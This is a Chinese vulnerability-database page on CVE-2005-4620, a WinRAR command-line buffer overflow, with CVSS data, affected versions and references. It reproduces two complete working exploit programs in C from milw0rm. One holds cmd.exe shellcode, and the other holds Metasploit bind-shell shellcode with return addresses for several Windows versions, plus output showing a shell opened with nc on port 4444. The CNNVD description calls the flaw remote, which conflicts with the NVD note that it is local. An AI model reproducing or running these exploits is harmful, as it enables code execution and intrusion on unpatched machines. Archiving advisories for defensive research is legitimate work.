CVE-2005-4620
CVSS4.6
发布时间 :2005-12-31 00:00:00
修订时间 :2008-09-05 16:57:21
NMCOE    

[原文]Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability.


[CNNVD]RARLAB WinRAR命令行处理溢出漏洞(CNNVD-200512-634)

        WinRar是非常流行的压缩/解压工具。
        WinRar对命令行的处理存在溢出漏洞,攻击者可能利用这个漏洞远程执行任意代码。由于在将用户提供的字符串拷贝到静态进程缓冲区之前没有正确的验证其长度,RARLAB WinRAR在处理命令行时存在远程客户端溢出漏洞。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:rarlab:winrar:3.42
cpe:/a:rarlab:winrar:3.20
cpe:/a:rarlab:winrar:3.10
cpe:/a:rarlab:winrar:3.11
cpe:/a:rarlab:winrar:3.30
cpe:/a:rarlab:winrar:3.40
cpe:/a:rarlab:winrar:3.10_beta5
cpe:/a:rarlab:winrar:3.0.0
cpe:/a:rarlab:winrar:3.41
cpe:/a:rarlab:winrar:3.10_beta3
cpe:/a:rarlab:winrar:2.90
cpe:/a:rarlab:winrar:3.50

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4620
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4620
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-634
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c
(UNKNOWN)  MISC  http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c
http://www.securityfocus.com/bid/15123
(UNKNOWN)  BID  15123
http://www.securityfocus.com/archive/1/archive/1/420679/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060103 Winrar 3.30 Local Buffer Overflow
http://www.rarlab.com/rarnew.htm
(UNKNOWN)  MISC  http://www.rarlab.com/rarnew.htm

- 漏洞信息

RARLAB WinRAR命令行处理溢出漏洞
中危 缓冲区溢出
2005-12-31 00:00:00 2006-01-11 00:00:00
远程  
        WinRar是非常流行的压缩/解压工具。
        WinRar对命令行的处理存在溢出漏洞,攻击者可能利用这个漏洞远程执行任意代码。由于在将用户提供的字符串拷贝到静态进程缓冲区之前没有正确的验证其长度,RARLAB WinRAR在处理命令行时存在远程客户端溢出漏洞。

- 公告与补丁

        

- 漏洞信息 (1403)

WinRAR 3.30 Long Filename Buffer Overflow Exploit (EDBID:1403)
windows local
2006-01-04 Verified
0 K4P0
[点击下载] [点击下载]
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: k4p0k4p0@hotmail.com
*/

#include <stdio.h>
#include <windows.h>

int main(void)
{
   char EvilBuff[1024];

   // Normal cmd.exe shellcode.
   char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
   		      "\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
		      "\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
                      "\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";

   char jmpesp_offset[] = "\x0F\x98\xF8\x77";
   char Prog[1024] = "WinRAR ";

   printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
   printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
   printf("Exploit made by: K4P0\n");
   memset(EvilBuff, 0x00, 1024);
   memset(EvilBuff, 0x41, 510);
   strncat(EvilBuff, jmpesp_offset, 1024);
   strncat(EvilBuff, shellcode, 1024);
   strncat(Prog, EvilBuff, 1024);
   printf("\nExploiting...\n");
   system(Prog);
   return 0;
}

// milw0rm.com [2006-01-04]
		

- 漏洞信息 (1404)

WinRAR 3.30 Long Filename Buffer Overflow Exploit (more targets) (2) (EDBID:1404)
windows local
2006-01-04 Verified
0 c0d3r
[点击下载] [点击下载]
/*
	IHS public source code 
	WinRAR 3.3.0 and below local BOF exploit
	author : c0d3r , kaveh razavi <c0d3r@ihsteam.com>
	advisory : http://www.securityfocus.com/archive/1/420679
	tnx to alpha who reported the vulnerability
	workaround: use the lastest version
	special tnx to LorD and NT of IHS (my workmates and best friends)
	www.ihsteam.com
	www.ihsteam.net
	www.c0d3r.org
	showing some of iranian kids what real hacking is . 
	specially those who think changing a name server is hacking =)
*/

#include<stdio.h>
#include<string.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 930

char exploit[size];
char winxpsp1[]   = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
char winxpsp2[]   = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
char win2ksp4[]   = "\xBB\xED\x4F\x7C"; // call esp in kernel32.dll
char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
char *exec[3];
char point_esp[5];
unsigned int os;

// metasploit shellcode LPORT=4444
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

usage(){
 
 printf("-------- usage : ihs_winrar.exe OS_VER\n");
 printf("-------- target 1 : windows xp service pack 1         : 0\n");
 printf("-------- target 2 : windows xp service pack 2         : 1\n");
 printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
 printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
 printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
 printf("-------- eg : ihs_winrar.exe 2\n\n");	
 exit(-1) ;
  }
int main(int argc , char **argv){
 
 printf("\n-------- WinRAR 330 and below Local BOF exploit by c0d3r\n");
 if(argc < 2)  
	usage();
  printf("\n");
 os = (unsigned short)atoi(argv[1]); 	 
  switch(os)
  {
   case 0:
    strcat(point_esp,winxpsp1);
    printf("[+] target : windows xp service pack 1\n");
	break;
   case 1:
    strcat(point_esp,winxpsp2); 
    printf("[+] target : windows xp service pack 2\n");
	break;
   case 2:
    strcat(point_esp,win2ksp4); 
    printf("[+] target : windows 2000 advanced server service pack 4\n");
	break;
   case 3:
	strcat(point_esp,win2k3_sp0);
	printf("[+] target : windows 2003 server enterprise service pack 0\n");
	break;
   case 4:
	strcat(point_esp,win2k3_sp1);
	printf("[+] target : windows 2003 server enterprise service pack 1\n");
	break;
   default:
    printf("\n[-] this target doesnt exist in the list\n\n");
   
    exit(-1);
  }  

printf("[+] exploit string is %d byte\n",size);
printf("[+] shellcode is %d byte\n", sizeof(shellcode)-1);
printf("[+] making exploit string :)\n");
memset(exploit,NOP,size);
memcpy(exploit+516,point_esp,sizeof(point_esp)-1);
memcpy(exploit+530,shellcode,sizeof(shellcode)-1);
exploit[size]=0x00;
printf("[+] exploit string ready\n");
printf("[+] preparing the executer\n");
exec[0]="WinRAR.exe";
exec[2]=NULL;
exec[1]=exploit;
printf("[+] executer ready\n");
printf("[+] exploiting ........\n");
execve(exec[0],exec,NULL);

return 0x0;
}
/*

I:\Program Files\WinRAR>ihs_winrar 2

-------- WinRAR 330 and below Local BOF exploit by c0d3r

[+] target : windows 2000 advanced server service pack 4
[+] exploit string is 930 byte
[+] shellcode is 399 byte
[+] making exploit string :)
[+] exploit string ready
[+] preparing the executer
[+] executer ready
[+] exploiting ........

I:\Program Files\WinRAR>nc -vv 127.0.0.1 4444
iran [127.0.0.1] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

I:\Program Files\WinRAR>

*/

// milw0rm.com [2006-01-04]
		

- 漏洞信息

22364
WinRAR for Windows Archive Filename Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-03 Unknow
2006-01-04 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站